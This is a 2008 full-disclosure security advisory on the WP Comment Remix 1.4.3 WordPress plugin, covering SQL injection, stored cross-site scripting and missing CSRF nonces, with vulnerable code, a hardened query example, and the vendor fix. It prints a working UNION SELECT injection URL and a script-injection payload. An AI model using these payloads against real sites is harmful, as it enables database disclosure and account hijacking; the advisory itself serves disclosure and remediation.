wpcomment-multi.txt

wpcomment-multi.txt
Posted Oct 14, 2008
Authored by g30rg3_x

WP Comment Remix version 1.4.3 suffers from cross site scripting, cross site request forgery, and SQL injection vulnerabilities.

tags | exploit, vulnerability, xss, sql injection, csrf
SHA-256 | 44edf97b2cd78b955622c67fb8230bd28b677939fe34ec4646e5ca24ef73a30a

___________
ChX Security |
Advisory #3 |
==========

-> "WP Comment Remix 1.4.3 Multiple Vulnerabilities" <-

_________________
Advisory Information |
===============
Title: WP Comment Remix 1.4.3 Multiple Vulnerabilities
Author: g30rg3_x <g30rg3x_at_chxsecurity_dot_org>
Advisory URL: http://chxsecurity.org/advisories/adv-3-full.txt
Date of last update: 2008-10-13
CVE Name: --

____________________
Vulnerability Information |
==================
Software: WP Comment Remix
Version: 1.4.3
From: Remote
Severity: Extremely Critical
Impact:
Manipulation of data
Cross-Site Scripting
Type of Advisory: Full Disclosure

_________________
Software Description |
===============
WP Comment Remix adds a plethora of new options and features to WordPress.
From Reply and Quote links for commenters, to a full upgrade to the edit
comments pages in the admin panel, WPCR will save you time and effort when
running your blog.

____________________
Vulnerability Description |
==================
WP Comment Remix has multiple vulnerabilities which allow remote attackers
to conduct SQL Injection, Cross-Site Scripting and Cross-Site Request
Forgery attacks.
The SQL Injection is possible because the comment post ID variable in the
AJAX Comments script is used without any filtering.
The Cross-Site Scripting is possible because several stored options are
neither filtered on input nor escaped on output.
The Cross-Site Request Forgery is caused by the absence of WordPress Nonces
on the options panel form.

__________________
Technical Description |
================
* SQL Injection *
Inside the script "ajax_comments.php" (around lines 27 to 29):

/---------------------
$id = $_GET['p'];

$comments = $wpdb->get_results("SELECT * FROM $wpdb->comments WHERE
comment_post_ID = $id AND comment_approved != 'spam' ORDER BY
comment_date DESC");
----------------------/
As the code shows, the value of $id is taken directly from the HTTP GET
variable "p" and then interpolated into the SQL query passed to the
get_results method of the $wpdb object (which lets WordPress plugin
developers pull multiple row results from the database). Because nothing
validates or escapes the value, SQL code can be injected and the rows it
returns are later displayed by the script as comment data.

As an example, a request like the following:
/----------------------
ajax_comments.php?p=0 UNION SELECT
1,2,user(),4,5,6,7,8,CONCAT(database(),0x3C62723E,version()),10,11,12,13,14,15
--
-----------------------/
returns the MySQL user, the database name and the MySQL version used on the server.
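As an added example (not code from the plugin, the vendor's 1.4.4 fix, or this advisory), the same query written the way a WordPress plugin should issue it: the post ID is coerced to a non-negative integer with absint() and bound through $wpdb->prepare() with a %d placeholder, so the "p" parameter can only ever select a different post, never change the structure of the statement. The function name wpcr_example_fetch_comments is an assumption for illustration.

```php
<?php
// Added example: a hardened version of the query from ajax_comments.php.
// Not the plugin's own code; the function name is illustrative only.
// Assumes it runs inside WordPress, where $wpdb, absint() and
// $wpdb->prepare() are available.

function wpcr_example_fetch_comments() {
    global $wpdb;

    // No post id supplied: nothing to look up, and no query is issued.
    if ( ! isset( $_GET['p'] ) ) {
        return array();
    }

    // absint() turns the raw string into a non-negative integer. A value
    // such as "0 UNION SELECT ..." is not a number and collapses to 0.
    $post_id = absint( $_GET['p'] );
    if ( 0 === $post_id ) {
        return array();
    }

    // %d binds the value as an integer. The table name comes from $wpdb
    // itself, never from user input, so interpolating it is safe.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->comments}
          WHERE comment_post_ID = %d
            AND comment_approved != 'spam'
          ORDER BY comment_date DESC",
        $post_id
    );

    return $wpdb->get_results( $sql );
}
```

The two layers are deliberate: absint() rejects anything that is not a post ID before the database is touched, and prepare() guarantees that even a numeric value reaches MySQL as a bound literal rather than as part of the query text.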



* Cross-Site Scripting *
Inside the script "wpcommentremix.php" (around lines 611 to 781):

(The next code is truncated to only show the vulnerable parts of the code)
/----------------------
$options['replytotext'] = $_POST['replytotext'];
...
$options['quotetext'] = $_POST['quotetext'];
$options['originallypostedby'] = $_POST['originallypostedby'];
$options['sep'] = $_POST['sep'];
$options['maxtags'] = $_POST['maxtags'];
...
$options['tagsep'] = $_POST['tagsep'];
$options['tagheadersep'] = $_POST['tagheadersep'];
$options['taglabel'] = $_POST['taglabel'];
$options['tagheaderlabel'] = $_POST['tagheaderlabel'];
...
<input type="text" name="replytotext" value="<?=$options['replytotext']?>"><br/>
...
<input type="text" name="quotetext" value="<?=$options['quotetext']?>"><br/>
...
<input type="textbox" name="originallypostedby"
value='<?=$options['originallypostedby'];?>' />
...
<input type="text" name="sep" value="<?=$options['sep']?>"><br/>
...
<input type="text" name="taglabel" value="<?=$options['taglabel']?>"><br/>
...
<input type="text" name="tagsep" value="<?=$options['tagsep']?>"><br/>
...
<input type="text" name="maxtags" value="<?=$options['maxtags']?>"><br/>
...
<input type="text" name="tagheaderlabel"
value="<?=$options['tagheaderlabel']?>"><br/>
...
<input type="text" name="tagheadersep"
value="<?=$options['tagheadersep']?>"><br/>
-----------------------/
These variables are neither filtered nor escaped, so if a value like the
following is stored...

/----------------------
5"><script>alert(String.fromCharCode(88,83,83));</script><input
type=hidden name=foo id="
-----------------------/
...then, when the stored data is retrieved and displayed on the dashboard
options panel, the injected markup is rendered and the attack succeeds.

NOTE: Some of these options (like replytotext) are also rendered to public
visitors, so the injected markup can reach pages outside of the plugin's
dashboard options panel as well.



* Cross-Site Request Forgery *
The form generated by the wpcr_do_options_page function
(wpcommentsremix.php at line 585) contains no WP Nonce (the mechanism that
prevents this type of attack) and relies only on a simple hidden input
named "wpcr_hidden_form_input" with a value of "1". Because of this, an
attacker can force a logged-in user to submit data to the form; combined
with the Cross-Site Scripting vulnerability discussed above, this makes the
issue very dangerous.

______________
Proof of Concept |
=============
Can be downloaded from here:
http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip

_______
Solution |
======
Upgrade to version 1.4.4

_______
Timeline |
=======
Bug Found: 16/09/2008
Vendor Contact: 20/09/2008
Vendor Response: 23/09/2008
Public Disclosure: 13/10/2008


ChX Security
http://chxsecurity.org/
(c) 2008

--
Original: http://chxsecurity.org/advisories/adv-3-full.txt